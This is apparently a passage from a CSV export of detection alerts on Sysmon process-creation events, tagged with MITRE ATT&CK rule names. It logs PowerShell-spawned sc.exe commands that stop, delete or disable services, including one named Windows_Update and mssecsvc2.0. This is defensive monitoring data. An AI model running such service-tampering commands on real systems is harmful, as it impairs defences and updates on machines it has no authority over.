WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.943902200Z"",""eventRecordID"":""2117"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.942\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010776b1900}\r\nProcessId: 6208\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.942"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010776b1900}"",""processId"":""6208"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.244",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.922 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010e5691900} +ProcessId: 5076 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.924156000Z"",""eventRecordID"":""2115"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.922\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010e5691900}\r\nProcessId: 5076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.922"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010e5691900}"",""processId"":""5076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.216",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.912 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-00101c691900} +ProcessId: 1552 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.915238800Z"",""eventRecordID"":""2114"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.912\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00101c691900}\r\nProcessId: 1552\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.912"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00101c691900}"",""processId"":""1552"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.151",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.882 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010c0661900} +ProcessId: 6000 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.884322500Z"",""eventRecordID"":""2111"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.882\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010c0661900}\r\nProcessId: 6000\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.882"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010c0661900}"",""processId"":""6000"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.102",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.850 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001063641900} +ProcessId: 3512 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.852136500Z"",""eventRecordID"":""2108"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.850\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001063641900}\r\nProcessId: 3512\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.850"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001063641900}"",""processId"":""3512"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.087",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.840 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001099631900} +ProcessId: 960 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Windows_Update Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.842467600Z"",""eventRecordID"":""2107"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.840\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001099631900}\r\nProcessId: 960\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.840"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001099631900}"",""processId"":""960"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Windows_Update Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.056",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.817 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001007621900} +ProcessId: 3952 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.820112000Z"",""eventRecordID"":""2105"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.817\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001007621900}\r\nProcessId: 3952\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 